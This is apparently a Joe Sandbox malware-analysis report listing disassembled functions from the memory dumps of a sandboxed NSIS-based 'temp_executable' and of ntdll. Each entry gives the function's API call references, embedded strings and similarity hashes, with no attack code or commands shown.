Function 338F6565 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 338F6614
RtlDebugPrintTimes.NTDLL ref: 338F665F

Strings

Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 33959843
LdrpLoadShimEngine, xrefs: 3395984A, 3395988B
minkernel\ntdll\ldrinit.c, xrefs: 33959854, 33959895
Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 33959885

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-3589223738
Opcode ID: 3517d6b46956eddf644791696fa0d62578a8d95f0afb643d94455986d1c57fed
Instruction ID: f01e4651e6710c77b0680b12a028b30d8f3cca207e5ebbbab808b83954252231
Opcode Fuzzy Hash: 3517d6b46956eddf644791696fa0d62578a8d95f0afb643d94455986d1c57fed
Instruction Fuzzy Hash: E7510276E04348DFEB04EFA8C894EAD77EAEB44355F080269E550BF296CB759C41CB80

Function 3392DA20 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3396F41B

Strings

RtlUnlockHeap, xrefs: 3396F467
HEAP[%wZ]: , xrefs: 3396F444
, passed to %s, xrefs: 3396F46C
Invalid heap signature for heap at %p, xrefs: 3396F45D
HEAP: , xrefs: 3396F451

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID: DebugPrintTimes
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
API String ID: 3446177414-3224558752
Opcode ID: 17480a09f837a58f401d73b15f3c94afe1187ed300522ecb1937ee7b5feba588
Instruction ID: e49fd2f499b757efc008729cbef2c23a3f6e8f421cf4741fe01d7b5bd7df87ef
Opcode Fuzzy Hash: 17480a09f837a58f401d73b15f3c94afe1187ed300522ecb1937ee7b5feba588
Instruction Fuzzy Hash: F1415B35A09B44DFF711DF6CC484B59B7B8EF403A4F148669E46687B81CB749980CB51

Function 339AECD7 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 339AEDD0
RtlDebugPrintTimes.NTDLL ref: 339AEE45

Strings

Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 339AEDE3
HEAP: , xrefs: 339AECDD
---------------------------------------, xrefs: 339AEDF9
Entry Heap Size , xrefs: 339AEDED

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID: DebugPrintTimes
String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
API String ID: 3446177414-1102453626
Opcode ID: 146334934749001df94f7011933b8e3649b44909d9697494b5ae70988c377808
Instruction ID: b514976a96b339344fba6c9771a986c06c342199ab0a805c234fb870963f1512
Opcode Fuzzy Hash: 146334934749001df94f7011933b8e3649b44909d9697494b5ae70988c377808
Instruction Fuzzy Hash: 8B416D3AE05215DFD705DF1CC48495ABBF9EF49395B298269D408AF321D732ED82CB90

Function 00402683 Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026D7
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026F3
GlobalFree.KERNEL32(?), ref: 0040272C
WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 0040273E
GlobalFree.KERNEL32(00000000), ref: 00402745
CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 0040275D
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 00402771

Memory Dump Source

Source File: 00000002.00000002.13500514197.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.13500419295.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500613130.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500695429.0000000000409000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500755233.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID:
API String ID: 3294113728-0
Opcode ID: 689b85a215e10f9e2975cf1285ad73087eca50e63662aca7bd35c8278112a5a0
Instruction ID: 3852b7668eb2638a640f728426397d6192e80a26e925a200138047876d2d45ee
Opcode Fuzzy Hash: 689b85a215e10f9e2975cf1285ad73087eca50e63662aca7bd35c8278112a5a0
Instruction Fuzzy Hash: 96317A71C00128BBDF216FA5CD89DAE7E79EF08364F10422AF920762E0D6795D419BA9

Function 3392DAC0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3396F561

Strings

HEAP[%wZ]: , xrefs: 3396F58A
, passed to %s, xrefs: 3396F5B2
RtlLockHeap, xrefs: 3396F5AD
Invalid heap signature for heap at %p, xrefs: 3396F5A3
HEAP: , xrefs: 3396F597

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID: DebugPrintTimes
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
API String ID: 3446177414-1222099010
Opcode ID: 7c96588a27a664ad52ce7529459905cd1eb67fc833f4722429b2e9d40cd16fc7
Instruction ID: aecb27e3ac25df73249f23ef6d937de4cc060d348ee961541962ebe362e87f52
Opcode Fuzzy Hash: 7c96588a27a664ad52ce7529459905cd1eb67fc833f4722429b2e9d40cd16fc7
Instruction Fuzzy Hash: 0631A935606B88DFE322DB68D428B593BECEF013A4F040185F4628BB92CB75ED40CB01

Function 00404E7C Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00429000,00000000,?,764D23A0,?,?,?,?,?,?,?,?,?,00402FBC,00000000,?), ref: 00404EB5
lstrlenA.KERNEL32(00402FBC,00429000,00000000,?,764D23A0,?,?,?,?,?,?,?,?,?,00402FBC,00000000), ref: 00404EC5
lstrcatA.KERNEL32(00429000,00402FBC,00402FBC,00429000,00000000,?,764D23A0), ref: 00404ED8
SetWindowTextA.USER32(00429000,00429000), ref: 00404EEA
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F10
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F2A
SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F38

Memory Dump Source

Source File: 00000002.00000002.13500514197.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.13500419295.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500613130.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500695429.0000000000409000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500755233.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 73e8ba0382c830ad19924dd23f2f2f98bea930d2f903883da69ce143c6fc22e3
Instruction ID: bec9e42dfe10d11ae3f9da453690961036ef7877893a7332badb98976ce689fd
Opcode Fuzzy Hash: 73e8ba0382c830ad19924dd23f2f2f98bea930d2f903883da69ce143c6fc22e3
Instruction Fuzzy Hash: 6B218C71D00118BADF119FA5CC80E9EBFB9EF44358F00807AF944B6291C739AE40CBA8

Function 00404747 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404762
GetMessagePos.USER32 ref: 0040476A
ScreenToClient.USER32(?,?), ref: 00404784
SendMessageA.USER32(?,00001111,00000000,?), ref: 00404796
SendMessageA.USER32(?,0000110C,00000000,?), ref: 004047BC

Strings

f, xrefs: 00404798

Memory Dump Source

Source File: 00000002.00000002.13500514197.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.13500419295.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500613130.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500695429.0000000000409000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500755233.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
Instruction ID: c5a6753d0d9a08ec20861e0abf538a780563573202a5f4a853919173bafec1ff
Opcode Fuzzy Hash: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
Instruction Fuzzy Hash: 1F015275D00218BADB01DB94DC45FFEBBBCAF55711F10412BBA10B71C0C7B865018BA5

Function 00402B42 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B5D
MulDiv.KERNEL32(?,00000064,?), ref: 00402B88
wsprintfA.USER32 ref: 00402B98
SetWindowTextA.USER32(?,?), ref: 00402BA8
SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BBA

Strings

verifying installer: %d%%, xrefs: 00402B92

Memory Dump Source

Source File: 00000002.00000002.13500514197.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.13500419295.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500613130.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500695429.0000000000409000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500755233.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 617ddd64424c569eed37efdba56663e5011ffbcc16745b9a1190651759ad78bb
Instruction ID: 73eba29f4f71f0575b3f4d6169dd72a4e637aea185fae63b28e602e2a4acafde
Opcode Fuzzy Hash: 617ddd64424c569eed37efdba56663e5011ffbcc16745b9a1190651759ad78bb
Instruction Fuzzy Hash: 91016770A40208BBDF249F60DD09EEE3779AB00745F008039FA06F52D0D7B5A951CF99

Function 33909046 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 33962360

Strings

@, xrefs: 33909095
$, xrefs: 339090B1

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$@
API String ID: 3446177414-1194432280
Opcode ID: 684b41141729acb72fa90db5b0f82bce8977dc09786382ea6ea270ab47f99ccb
Instruction ID: 3e80fd92ee8fa98ade970558c451c49e15ede2b94da65a6254abb6cd09336af2
Opcode Fuzzy Hash: 684b41141729acb72fa90db5b0f82bce8977dc09786382ea6ea270ab47f99ccb
Instruction Fuzzy Hash: E3814C71D01269DBDB21CF54CC40BEEB7B8AB48754F0041EAE909BB690D7705E85CFA0

Function 33934C3D Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 33934C84

Strings

Querying the active activation context failed with status 0x%08lx, xrefs: 33973466
minkernel\ntdll\ldrsnap.c, xrefs: 3397344A, 33973476
LdrpFindDllActivationContext, xrefs: 33973440, 3397346C
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 33973439

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID: DebugPrintTimes
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 3446177414-3779518884
Opcode ID: 62ad50df4975e27d8855e379ace101f9d251eb1c703e3a9e383e39761a1f43e2
Instruction ID: 69e18298ca4f69de3ab9bdd8b9998fe8b72e431b7d507127dc18410f0dcf73cf
Opcode Fuzzy Hash: 62ad50df4975e27d8855e379ace101f9d251eb1c703e3a9e383e39761a1f43e2
Instruction Fuzzy Hash: C731D5F6A02351EFFB21AB44C884AD5B7ACFB073F5F4B8166D4406B1A1D7A0DCC08691

Function 00401F68 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401F93

Part of subcall function 00404E7C: lstrlenA.KERNEL32(00429000,00000000,?,764D23A0,?,?,?,?,?,?,?,?,?,00402FBC,00000000,?), ref: 00404EB5
Part of subcall function 00404E7C: lstrlenA.KERNEL32(00402FBC,00429000,00000000,?,764D23A0,?,?,?,?,?,?,?,?,?,00402FBC,00000000), ref: 00404EC5
Part of subcall function 00404E7C: lstrcatA.KERNEL32(00429000,00402FBC,00402FBC,00429000,00000000,?,764D23A0), ref: 00404ED8
Part of subcall function 00404E7C: SetWindowTextA.USER32(00429000,00429000), ref: 00404EEA
Part of subcall function 00404E7C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F10
Part of subcall function 00404E7C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F2A
Part of subcall function 00404E7C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F38

LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FA3
GetProcAddress.KERNEL32(00000000,?), ref: 00401FB3
FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040201D

Strings

B, xrefs: 00401FDD

Memory Dump Source

Source File: 00000002.00000002.13500514197.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.13500419295.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500613130.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500695429.0000000000409000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500755233.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID: B
API String ID: 2987980305-2386870291
Opcode ID: d115f86410b0daf91d171d1460d83b35a78a5fa87ab9381f48f71df4f6a750fe
Instruction ID: c9057b5ece4bb598837aab6aa7fd84f94fd7ed62459683fea6a67aa899d5519e
Opcode Fuzzy Hash: d115f86410b0daf91d171d1460d83b35a78a5fa87ab9381f48f71df4f6a750fe
Instruction Fuzzy Hash: 7B212B32904215F7DB107FA5CE4DA6E39B0AB48358F70823BF600B62D0DBBC4D419A6E

Function 00405DFC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,*?|<>/":,00000000,00434000,00435400,00435400,00000000,004030BA,00435400,764D3410,00403294), ref: 00405E54
CharNextA.USER32(?,?,?,00000000), ref: 00405E61
CharNextA.USER32(?,00434000,00435400,00435400,00000000,004030BA,00435400,764D3410,00403294), ref: 00405E66
CharPrevA.USER32(?,?,00435400,00435400,00000000,004030BA,00435400,764D3410,00403294), ref: 00405E76

Strings

*?|<>/":, xrefs: 00405E44

Memory Dump Source

Source File: 00000002.00000002.13500514197.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.13500419295.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500613130.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500695429.0000000000409000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500755233.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: 23e10a89c186aeb9d4ae81216154e90e4a11c9f17e12c8179a136c01dc061f6b
Instruction ID: d9f26e5b90d06d21ed3ce52f9e74cde850698f16693a1e2037ff65b0147420f0
Opcode Fuzzy Hash: 23e10a89c186aeb9d4ae81216154e90e4a11c9f17e12c8179a136c01dc061f6b
Instruction Fuzzy Hash: E111C872804B9529EB3217348C44B777F99CB967A0F58047BE8D4722C2D67C5E428EAD

Function 0040173F Relevance: 7.6, APIs: 5, Instructions: 147stringtimeCOMMON

Download Yara Rule

APIs

lstrcatA.KERNEL32(00000000,00000000,004093C0,00434800,00000000,00000000,00000031), ref: 0040177E
CompareFileTime.KERNEL32(-00000014,?,004093C0,004093C0,00000000,00000000,004093C0,00434800,00000000,00000000,00000031), ref: 004017A8

Part of subcall function 00405B91: lstrcpynA.KERNEL32(?,?,00000400,00403152,0042DBA0,NSIS Error), ref: 00405B9E

Part of subcall function 00404E7C: lstrlenA.KERNEL32(00429000,00000000,?,764D23A0,?,?,?,?,?,?,?,?,?,00402FBC,00000000,?), ref: 00404EB5
Part of subcall function 00404E7C: lstrlenA.KERNEL32(00402FBC,00429000,00000000,?,764D23A0,?,?,?,?,?,?,?,?,?,00402FBC,00000000), ref: 00404EC5
Part of subcall function 00404E7C: lstrcatA.KERNEL32(00429000,00402FBC,00402FBC,00429000,00000000,?,764D23A0), ref: 00404ED8
Part of subcall function 00404E7C: SetWindowTextA.USER32(00429000,00429000), ref: 00404EEA
Part of subcall function 00404E7C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F10
Part of subcall function 00404E7C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F2A
Part of subcall function 00404E7C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F38

Memory Dump Source

Source File: 00000002.00000002.13500514197.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.13500419295.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500613130.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500695429.0000000000409000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500755233.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID:
API String ID: 1941528284-0
Opcode ID: 87cc0a09f9a596be3997dc95dd75862fa03618459af6fa845bb54b61416ad007
Instruction ID: 4c0a073a0a50a016330575191a1a6545d3ec5be94f2f3c544cdbcd56c7493ec8
Opcode Fuzzy Hash: 87cc0a09f9a596be3997dc95dd75862fa03618459af6fa845bb54b61416ad007
Instruction Fuzzy Hash: A941C371900515BADF10BBA9DC46DAF3679DF05368B20423BF421F20E2D77C5A419AAD

Function 00402A3D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A5E
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A9A
RegCloseKey.ADVAPI32(?), ref: 00402AA3
RegCloseKey.ADVAPI32(?), ref: 00402AC8
RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AE6

Memory Dump Source

Source File: 00000002.00000002.13500514197.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.13500419295.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500613130.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500695429.0000000000409000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500755233.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 6128ad1f95e0d45aeb4fc038169a3f4e17ade998af3df8cbe34db4d02bca8b11
Instruction ID: 4f9eb0324db645217cd312817ce5f5f90673302cc8682bf6f7f2a23cea7074e4
Opcode Fuzzy Hash: 6128ad1f95e0d45aeb4fc038169a3f4e17ade998af3df8cbe34db4d02bca8b11
Instruction Fuzzy Hash: A3114C75A00008FFDF21AF90DE49EAF3B6DEB54348B104036FA05B10A0DBB49E51AF69

Function 00401CCC Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 00401CD0
GetClientRect.USER32(00000000,?), ref: 00401CDD
LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401CFE
SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D0C
DeleteObject.GDI32(00000000), ref: 00401D1B

Memory Dump Source

Source File: 00000002.00000002.13500514197.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.13500419295.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500613130.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500695429.0000000000409000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500755233.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 61fc1dba9fda1762062bb2b77790a6befe8e60fa3738e2a0c52d9c777096eb7d
Instruction ID: a37ff7ddff9b943901b48b8e13d91397296dd9e34982c61b5f8f3387a39b4807
Opcode Fuzzy Hash: 61fc1dba9fda1762062bb2b77790a6befe8e60fa3738e2a0c52d9c777096eb7d
Instruction Fuzzy Hash: D8F012B2A05115BFE701EBA4EE89DAF77BCEB44301B108576F501F2191C7749D018B79

Function 00401D26 Relevance: 7.5, APIs: 5, Instructions: 38COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401D29
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D36
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D45
ReleaseDC.USER32(?,00000000), ref: 00401D56
CreateFontIndirectA.GDI32(0040A7C8), ref: 00401DA1

Memory Dump Source

Source File: 00000002.00000002.13500514197.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.13500419295.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500613130.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500695429.0000000000409000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500755233.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: 5c9cd3ac56969fe30278c88d56c25a930fef8193034729040990e91125b79c66
Instruction ID: 2cbf7b26bffa346353c04d8a5f9262401d36b0fa9ffcbdeb30b58970b6715d39
Opcode Fuzzy Hash: 5c9cd3ac56969fe30278c88d56c25a930fef8193034729040990e91125b79c66
Instruction Fuzzy Hash: 46018671955380AFEB019BB0AF0AB9A3FB4E715705F20843AF141BB2E2C5B95411DB2F

Function 338FF8B0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3395E51F

Strings

(HeapHandle != NULL), xrefs: 3395E4A8
HEAP[%wZ]: , xrefs: 3395E490
HEAP: , xrefs: 3395E49D

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID: DebugPrintTimes
String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 3446177414-3610490719
Opcode ID: 09748759fa4b58471c6488d973d0366226bb16b6853afdae3ef48267ada9fcda
Instruction ID: bef78a58ff90a2e0a77369113d696a010a3f66dd0b528ea1185ae8e13c208579
Opcode Fuzzy Hash: 09748759fa4b58471c6488d973d0366226bb16b6853afdae3ef48267ada9fcda
Instruction Fuzzy Hash: D7915A71B05740EFE706DF68D880B5EB7A9FF44B80F140659F8909B692DB36D881CB92

Function 33920AEB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 33920BFC

Strings

minkernel\ntdll\ldrinit.c, xrefs: 33969F2E
LdrpCheckModule, xrefs: 33969F24
Failed to allocated memory for shimmed module list, xrefs: 33969F1C

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-161242083
Opcode ID: 5d464de5628b9bafdbf8a227178c6fe2350a90ea1978e5b9eab437ab5c8be6d6
